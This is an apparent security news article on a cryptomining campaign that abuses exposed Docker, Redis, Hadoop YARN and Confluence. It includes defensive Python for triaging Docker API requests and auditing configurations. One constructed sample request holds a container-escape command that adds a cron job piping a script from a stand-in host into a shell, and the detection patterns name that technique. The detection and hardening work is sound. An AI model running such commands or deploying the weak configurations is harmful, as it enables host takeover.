Security researchers have uncovered a malware campaign targeting misconfigured, internet-facing deployments of Apache Hadoop YARN, Docker, Confluence, and Redis. What sets it apart is a set of new Golang payloads that automate the discovery and exploitation of vulnerable hosts.
According to an advisory from Cado Security Labs, the payloads achieve remote code execution (RCE) by abusing common misconfigurations in those services and, for Confluence, by exploiting CVE-2022-26134. Once on a host, the attackers drop shell scripts and use standard Linux post-exploitation techniques to establish persistence and run a cryptocurrency miner.
Attribution is difficult, but the shell script payloads resemble those seen in earlier cloud-focused attacks by TeamTNT, WatchDog, and the Kiss a Dog campaign. The overlap suggests shared or reused tooling among the groups targeting cloud environments rather than a firm link to any one of them.
Cado Security Labs first noticed the campaign as a cluster of initial-access activity on a Docker Engine API honeypot. A request to the exposed API from a single IP address created a container, which then wrote executable files to disk and installed cron jobs to run the attackers' commands.
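The honeypot activity described above (one API call creating a container that then drops files and installs cron jobs) is the kind of event a defender can triage directly from Docker Engine API request records. The following Python is an added example, not Cado's code or anything from the original report. It assumes an audit proxy in front of the daemon records each request as a JSON object with source address, method, path and parsed body; the request records, the "trusted" address ranges, and the IP addresses and URL in the malicious request are all constructed for the example. It flags container-create calls from outside the trusted ranges, bind mounts of sensitive host paths, privileged containers, and commands that chroot into the mount, install cron entries, or pipe a remote script into a shell.

```python
import ipaddress
import re
from typing import Any, Dict, List

# Constructed request records, in the shape an audit proxy in front of the Docker
# daemon might produce (an assumption for this example; the daemon itself does not
# log requests in this form). Addresses and the payload URL are made up.
SAMPLE_REQUESTS: List[Dict[str, Any]] = [
    {"src": "10.0.0.7", "method": "GET", "path": "/v1.43/containers/json", "body": None},
    {"src": "203.0.113.45", "method": "POST", "path": "/v1.43/containers/create",
     "body": {"Image": "alpine:latest",
              "Cmd": ["chroot", "/mnt", "sh", "-c",
                      "echo '* * * * * curl -s http://198.51.100.9/s.sh | sh' | crontab -"],
              "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False}}},
    {"src": "203.0.113.45", "method": "POST", "path": "/v1.43/containers/3f9a1c/start", "body": None},
    {"src": "10.0.0.7", "method": "POST", "path": "/v1.43/containers/create",
     "body": {"Image": "nginx:1.25", "Cmd": None,
              "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}}},
]

# Networks from which container management is expected (assumed for the example).
TRUSTED_NETWORKS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("127.0.0.0/8")]

# Host paths an unattended API caller should never bind-mount.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock", "/var/spool/cron")

# Command fragments typical of "break out, persist, fetch payload" in a single create call.
SUSPICIOUS_CMD_PATTERNS = {
    "chroot into host mount": re.compile(r"\bchroot\s+/"),
    "cron persistence": re.compile(r"\bcrontab\b|/etc/cron"),
    "remote script piped to shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
}


def is_external(ip: str) -> bool:
    """True when the source address is outside every trusted network."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in TRUSTED_NETWORKS)


def sensitive_bind(bind: str) -> bool:
    """True when the host side of a 'host:container[:opts]' bind is a sensitive path."""
    host_path = bind.split(":", 1)[0]
    if host_path == "/":
        return True
    return any(host_path == p or host_path.startswith(p + "/")
               for p in SENSITIVE_HOST_PATHS if p != "/")


def triage_request(req: Dict[str, Any]) -> List[str]:
    """Return the reasons one container-create request looks like abuse (empty if none)."""
    if req["method"] != "POST" or not req["path"].endswith("/containers/create"):
        return []
    reasons: List[str] = []
    if is_external(req["src"]):
        reasons.append(f"create from untrusted source {req['src']}")
    body = req.get("body") or {}
    host_cfg = body.get("HostConfig") or {}
    for bind in host_cfg.get("Binds") or []:
        if sensitive_bind(bind):
            reasons.append(f"sensitive host path mounted: {bind}")
    if host_cfg.get("Privileged"):
        reasons.append("privileged container")
    cmd = " ".join(body.get("Cmd") or [])
    for label, pattern in SUSPICIOUS_CMD_PATTERNS.items():
        if pattern.search(cmd):
            reasons.append(label)
    return reasons


def triage(requests: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Keep only requests that raised at least one reason, with the reasons attached."""
    findings = []
    for req in requests:
        reasons = triage_request(req)
        if reasons:
            findings.append({"src": req["src"], "path": req["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        print(finding["src"], finding["path"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

Run against the sample, only the create call from 203.0.113.45 is reported, with five reasons; the internal nginx container (a read-only mount of a web root, no command) passes silently. On a honeypot every caller is untrusted, so the source-address check matters more on production daemons that legitimately accept API traffic from an orchestrator.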
Further analysis revealed an infection chain of several payloads and techniques for maintaining access, hiding malicious processes, and spreading to other vulnerable hosts. The malware also includes anti-forensic measures and logic specific to Alibaba Cloud and Tencent Cloud hosts.
One payload, fkoths, deletes Docker images to remove traces of the initial access. Another, s.sh, downloads further binary payloads and sets up their persistence on the infected host. The malware also carries payloads tailored to each target service (Apache Hadoop YARN, Confluence, and Redis) that combine port scanning, HTTP requests, and shell commands to obtain code execution.
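The "common misconfigurations" that give this campaign its foothold are management interfaces exposed without authentication: the Docker Engine API reachable over plain TCP, Redis bound to all interfaces with no password, and Hadoop web consoles (including the YARN ResourceManager REST API) accepting anonymous requests. The following Python is an added example rather than anything from the Cado advisory; it audits the three configuration files for those weak settings and shows each weak configuration beside a hardened counterpart. The sample configurations are constructed; the Redis password and the Docker TLS certificate paths are placeholders. Confluence is not a configuration matter and is addressed by patching CVE-2022-26134.

```python
import json
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed configuration samples (weak beside hardened); none is taken from a real host.
WEAK_REDIS_CONF = """
# listens on every interface with no password: anyone who can reach 6379 can run commands
bind 0.0.0.0
protected-mode no
port 6379
"""
HARDENED_REDIS_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
"""
WEAK_DAEMON_JSON = """
{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
"""
HARDENED_DAEMON_JSON = """
{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
 "tlsverify": true,
 "tlscacert": "/etc/docker/ca.pem",
 "tlscert": "/etc/docker/server-cert.pem",
 "tlskey": "/etc/docker/server-key.pem"}
"""
WEAK_CORE_SITE = """
<configuration>
  <property><name>hadoop.http.authentication.type</name><value>simple</value></property>
  <property><name>hadoop.http.authentication.simple.anonymous.allowed</name><value>true</value></property>
</configuration>
"""
HARDENED_CORE_SITE = """
<configuration>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.simple.anonymous.allowed</name><value>false</value></property>
</configuration>
"""


def parse_redis_conf(text: str) -> Dict[str, str]:
    """redis.conf is 'directive value...' per line; comments start with '#'."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        settings[parts[0].lower()] = parts[1].strip() if len(parts) > 1 else ""
    return settings


def audit_redis(text: str) -> List[str]:
    s = parse_redis_conf(text)
    findings = []
    bind = s.get("bind", "")
    # With no bind directive at all, Redis listens on every interface.
    if not bind or any(a in ("0.0.0.0", "*", "::") for a in bind.split()):
        findings.append("redis: listening on all interfaces")
    if s.get("protected-mode", "yes").lower() == "no":
        findings.append("redis: protected-mode disabled")
    if not s.get("requirepass"):
        findings.append("redis: no requirepass set")
    return findings


def audit_docker(text: str) -> List[str]:
    cfg = json.loads(text)
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    # A TCP listener without tlsverify accepts any client that can reach the port.
    if tcp_hosts and not cfg.get("tlsverify", False):
        return [f"docker: API on {tcp_hosts} without tlsverify (no client certificate check)"]
    return []


def audit_hadoop(text: str) -> List[str]:
    props = {p.findtext("name", ""): p.findtext("value", "")
             for p in ET.fromstring(text.strip()).iter("property")}
    auth = props.get("hadoop.http.authentication.type", "simple")
    anon = props.get("hadoop.http.authentication.simple.anonymous.allowed", "true")
    if auth == "simple" and anon.lower() == "true":
        return ["hadoop: web consoles and REST APIs (incl. YARN ResourceManager) accept anonymous requests"]
    return []


def audit_all(redis_conf: str, daemon_json: str, core_site: str) -> List[str]:
    return audit_redis(redis_conf) + audit_docker(daemon_json) + audit_hadoop(core_site)


if __name__ == "__main__":
    print("weak:", audit_all(WEAK_REDIS_CONF, WEAK_DAEMON_JSON, WEAK_CORE_SITE))
    print("hardened:", audit_all(HARDENED_REDIS_CONF, HARDENED_DAEMON_JSON, HARDENED_CORE_SITE))
```

The weak set produces five findings and the hardened set none. The Hadoop defaults are the trap: with no authentication properties set at all, the audit still reports anonymous access, because `simple` with anonymous allowed is what Hadoop ships with.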
Cado Security notes that the campaign illustrates the range of initial-access techniques now in use by cloud and Linux malware developers: attackers are investing time in understanding the web-facing services deployed in cloud environments, tracking newly reported vulnerabilities, and using that knowledge to get into target environments.
The Cado advisory lists indicators of compromise (IoCs) for the campaign, which organizations can use to hunt for its payloads and infrastructure on their own hosts. The durable fixes are not exposing the Docker Engine API, Redis, and YARN management interfaces to untrusted networks without authentication, and patching Confluence against CVE-2022-26134.